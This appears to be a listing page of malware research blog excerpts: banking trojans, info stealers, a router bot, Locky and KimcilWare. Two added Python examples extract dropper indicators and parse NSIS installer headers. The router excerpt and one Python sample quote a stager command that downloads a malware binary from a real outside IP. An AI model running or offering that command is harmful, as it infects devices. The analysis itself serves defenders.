threat research | Page 2


New variants of Android banking malware target even more German banks, popular social media apps, and more Summary In my previous blog I provided a detailed analysis of a new Android banking malware that spoofed the mobile applications of several large German banks to trick users into revealing their banking credentials. This week I found several new variants of this growing malware, and in this update I am sharing these new findings. Install the malware One of these variants masquerades as another German mobile banking app. Once installed,... [Read More]
by Kai Lu | Nov 18, 2016 | Filed in: Security Research
Summary We recently found an Android banking malware masquerading as an email app that targets several large German banks. This banking malware is designed to steal login credentials from 15 different mobile banking apps for German banks. It can also resist mobile anti-virus apps, hindering 30 different anti-virus programs and preventing them from launching. Install the malware The malware masquerades as an email app. Once installed, its icon appears in the launcher, as shown below. Figure 1. Malware App Icon Figure... [Read More]
by Kai Lu | Nov 18, 2016 | Filed in: Security Research
Following our research on Cyperine 2.0 and Next Man History Stealer, the malware author rebranded their info stealer as Medusa. While it has essentially the same features as Cyperine, you now need a valid account to access the builder. The example below compares Cyperine on the left and Medusa on the right, which shows a user logged in as Deadzeye. Figure 01. Builder comparison between Cyperine (Left) and Medusa (Right) The builder signatures clearly show that both of these variants were made by the same author, who goes by the name... [Read More]
by David Maciejak and Rommel Joven | Nov 10, 2016 | Filed in: Security Research
In the post “Home Routers - New Favorite of Cybercriminals in 2016”, we discussed the exploitation attempts against CVE-2014-9583 in ASUS routers that we have been detecting since June of this year. In this post we will dissect a bot installed on the affected ASUS routers. The following figure shows attack traffic captured with Wireshark. Figure 1. Exploitation of CVE-2014-9583 Below is the content of the file nmlt1.sh downloaded from hxxp://78.128.92.137:80/. #!/bin/sh cd /tmp rm -f .nttpd wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1 chmod... [Read More]
by Bing Liu | Oct 20, 2016 | Filed in: Security Research
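The nmlt1.sh stager quoted in the excerpt above follows the usual router-bot pattern: change to a writable directory, remove any earlier copy, fetch an architecture-specific binary (the ",17-mips-le-t1" suffix names the build) and then, in the truncated part, presumably mark it executable. When triaging such a dropper, the first things worth pulling out are the download URLs, the C2/hosting addresses and the path the payload lands on. The Python below is an added example, not code from the post or from the bot: it walks a dropper script, tracks `cd` so the dropped path is absolute, and returns one record per wget/curl fetch. The script it runs on is constructed: the first commands are the lines of nmlt1.sh visible in the excerpt, the last line is invented (documentation address 192.0.2.10) to show that several fetches are reported, and the excerpt's truncated chmod line is left out rather than guessed.

```python
"""Pull download IOCs (URL, host, port, dropped path) out of a shell dropper
script such as the nmlt1.sh stager quoted in the post.  Added example; not
code from the post or from the bot."""
import posixpath
import re
import shlex
from urllib.parse import urlsplit

# Constructed sample: the first commands are the lines of nmlt1.sh visible in
# the excerpt; the final line is invented (documentation address 192.0.2.10)
# to show that several fetches in one script are reported.  The excerpt's
# truncated chmod line is omitted rather than guessed.
SAMPLE_SCRIPT = """#!/bin/sh
cd /tmp
rm -f .nttpd
wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1
cd /var/tmp; wget -O .nttpd2 http://192.0.2.10:8080/.nttpd,17-arm-t1
"""

# output-file options of the downloaders these stagers use
DOWNLOADERS = {"wget": ("-O", "--output-document"), "curl": ("-o", "--output")}
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21}
SEPARATORS = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")   # split command chains


def extract_downloads(script, start_dir="/"):
    """Walk the script, tracking `cd`, and return one record per download."""
    cwd = start_dir
    found = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):      # also skips the shebang
            continue
        for part in SEPARATORS.split(line):
            try:
                argv = shlex.split(part)
            except ValueError:                    # unbalanced quotes: skip, do not guess
                continue
            if not argv:
                continue
            cmd = posixpath.basename(argv[0])
            if cmd == "cd" and len(argv) > 1:
                cwd = posixpath.normpath(posixpath.join(cwd, argv[1]))
            elif cmd in DOWNLOADERS:
                rec = _parse_fetch(cmd, argv[1:], cwd)
                if rec:
                    found.append(rec)
    return found


def _parse_fetch(tool, args, cwd):
    """Resolve the URL and the on-disk name of one wget/curl invocation."""
    out_flags = DOWNLOADERS[tool]
    long_eq = tuple(f + "=" for f in out_flags if f.startswith("--"))
    url = outfile = None
    i = 0
    while i < len(args):
        arg = args[i]
        if arg in out_flags and i + 1 < len(args):
            outfile = args[i + 1]
            i += 2
            continue
        if arg.startswith(long_eq):
            outfile = arg.split("=", 1)[1]
        elif arg.startswith(("http://", "https://", "ftp://")):
            url = arg
        i += 1
    if url is None:
        return None
    parts = urlsplit(url)
    remote_name = posixpath.basename(parts.path)
    if outfile is None:                           # no explicit name: wget keeps the remote name
        outfile = remote_name or "index.html"
    return {
        "tool": tool,
        "url": url,
        "host": parts.hostname,
        "port": parts.port or DEFAULT_PORTS.get(parts.scheme),
        "remote_name": remote_name,
        "dropped_path": posixpath.normpath(posixpath.join(cwd, outfile)),
    }


if __name__ == "__main__":
    for rec in extract_downloads(SAMPLE_SCRIPT):
        print(rec)
```

The records feed straight into blocklists (host and port), file-system hunts on the router (dropped path) and a pivot on the remote name, whose architecture suffix tells you which other builds to look for on the same host.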
My personal favorite talk was on exploiting Pebble smartwatches ("Exploit Millions of Pebble Smartwatches for Fun and Profit" by Zhang and Wei). Our expectations are usually higher in our own field of expertise, but this one is really great work. Pebble smartwatch talk at VB 2016 Basically, the authors found an internal assembly routine in Pebble's operating system that can be used to elevate one's privileges. If you are familiar with ROP, this is a privilege-elevation gadget. Normally, this routine is called by Pebble... [Read More]
by Axelle Apvrille | Oct 14, 2016 | Filed in: Industry Trends & News
We’re into the final quarter of the year, and the cyberthreat landscape continues to be interesting. This week in the Fortinet Threat Intelligence Brief we looked at a number of interesting trends around IoT botnets, continued ransomware problems – both through directed attacks and infected websites, and the spoofing of the Navy Federal US Credit Union. One interesting thing to note is how attacks tend to move from target to target and region to region in waves. This week, for example, we saw a 4X spike in attempts to deliver... [Read More]
by Bill McGee | Oct 07, 2016 | Filed in: Industry Trends & News
Over the last few months we saw that Locky’s loader requires a seed parameter to execute properly. This was probably meant to evade sandboxes, since the loader will not run without the correct parameter. Afterwards, we saw Locky shift from an EXE to a Dynamic Link Library (DLL). We recently encountered yet another Locky development, where samples use a Nullsoft Scriptable Install System (NSIS) package as their loader. In this post we will delve into how to unpack the final binary payload from its Nullsoft package loader. Decompressing Locky’s... [Read More]
by Floser Bacurio Jr. and Kenny Yongjian Yang | Sep 12, 2016 | Filed in: Security Research
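The excerpt ends before the unpacking steps. Whatever the exact procedure in the post, the first thing any NSIS unpacker needs is the position and fields of the "firstheader", the 28-byte record makensis writes in front of the packed data: the signature 0xDEADBEEF followed by "NullsoftInst", build flags, the uncompressed size of the header block and the size of the data that follows. The Python below is an added example, not the authors' procedure or NSIS project code: it finds that record in a file image, decodes its fields and reports where the packed data begins. The input it runs on is a constructed stand-in for a PE with an NSIS overlay produced by build_sample(), not a Locky sample; the firstheader constants and flag bits are taken from the NSIS source layout.

```python
"""Locate the NSIS 'firstheader' that marks the start of a Nullsoft installer's
packed data and decode its fields.  Added example, not the post's unpacking
procedure; the sample input is constructed by build_sample()."""
import struct

# siginfo 0xDEADBEEF followed by the int32 constants "Null", "soft", "Inst"
NSIS_MAGIC = b"\xef\xbe\xad\xdeNullsoftInst"
FH_SIZE = 28                               # seven little-endian int32 fields
FLAG_NAMES = {0x1: "uninstall", 0x2: "silent", 0x4: "no_crc", 0x8: "force_crc"}


def find_first_header(data):
    """Return (offset, info) for the first NSIS firstheader in `data`, else None.

    The flags field precedes the magic, so the record starts 4 bytes before the
    match.  The NSIS stub looks for its header at 512-byte steps, so a real hit
    normally sits at an aligned offset; the result records that as a sanity check.
    """
    pos = data.find(NSIS_MAGIC)
    while pos != -1:
        start = pos - 4
        if start >= 0 and start + FH_SIZE + 4 <= len(data):
            flags, _sig, _n1, _n2, _n3, hdr_len, data_len = struct.unpack_from(
                "<7I", data, start)
            # In a non-solid build the DWORD after the firstheader is the size of
            # the (usually compressed) header block, bit 31 set meaning "compressed".
            # Solid builds compress everything after the firstheader as one stream,
            # so treat these two values as hints to be confirmed by decompression.
            first_dword, = struct.unpack_from("<I", data, start + FH_SIZE)
            info = {
                "flags": [name for bit, name in FLAG_NAMES.items() if flags & bit],
                "header_len": hdr_len,        # uncompressed size of the header block
                "data_len": data_len,         # length_of_all_following_data as written by makensis
                "aligned_512": start % 512 == 0,
                "header_block_compressed": bool(first_dword & 0x80000000),
                "header_block_size": first_dword & 0x7FFFFFFF,
                "payload_offset": start + FH_SIZE,
            }
            return start, info
        pos = data.find(NSIS_MAGIC, pos + 1)
    return None


def build_sample(flags=0x4, header_len=0x1234, data_len=0x5678, overlay_at=512):
    """Constructed stand-in for a PE with an NSIS overlay: a fake stub padded to
    `overlay_at`, then a firstheader and a compressed-header-block length DWORD."""
    stub = b"MZ" + b"\x00" * (overlay_at - 2)
    fh = struct.pack("<7I", flags, 0xDEADBEEF, 0x6C6C754E, 0x74666F73, 0x74736E49,
                     header_len, data_len)
    header_block = struct.pack("<I", 0x80000000 | 0x100) + b"\x00" * 0x100
    return stub + fh + header_block


if __name__ == "__main__":
    offset, meta = find_first_header(build_sample())
    print(f"firstheader at 0x{offset:x}: {meta}")
```

On a real sample, `payload_offset` is where carving starts: the header block (decompressed to `header_len` bytes) describes the installer's sections and entries, and the embedded files follow it. The "no_crc" flag is worth noting during analysis, since a packer that skips the CRC lets a patched stub run unchanged.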
Fortinet’s FortiGuard Labs cybersecurity threat report takes a look at the nature of attacks – how attackers get in, how they manage to persist inside networks, what they want, and who they are. It also provides insight into three key areas of concern that our FortiGuard Labs team has identified, and they bear reviewing here. 2016 Rio Olympics: Cyberattacks during the Olympic games are not new. We have seen a spike of attacks focused on the Olympics – including targeting vendors and spectators – beginning as far back as the... [Read More]
by Ladi Adefala | Aug 01, 2016 | Filed in: Industry Trends & News
Cyperine is a VB .NET info-stealing malware advertised on hacking forums; it retrieves information from victims and sends it to whichever email address is entered in the builder. Cyperine version 1.0 was first released in December 2014, and version 2.0 was released on June 14, 2016. It steals Steam's SSFN authentication files, passwords stored in browsers, user logins, and the product keys of software installed on the victim’s computer. Figure 01. Cyperine builder The seller also provides a Skype account for... [Read More]
by Rommel Joven and David Maciejak | Jul 07, 2016 | Filed in: Security Research
A new ransomware targeting Magento websites was recently discovered by the Malware Hunter Team and Lawrence Abrams. This post shares additional findings of the FortiGuard Lion Team in three areas: 1) KimcilWare’s backdoor capabilities; 2) how files encrypted by KimcilWare can be decrypted; and 3) the hacker group that may be behind it. KimcilWare Backdoor Aside from encrypting files, KimcilWare is capable of opening a backdoor as well as uploading files to affected sites. The following KimcilWare code snippet shows... [Read More]
by Tien Phan and Roland Dela Paz | Apr 01, 2016 | Filed in: Security Research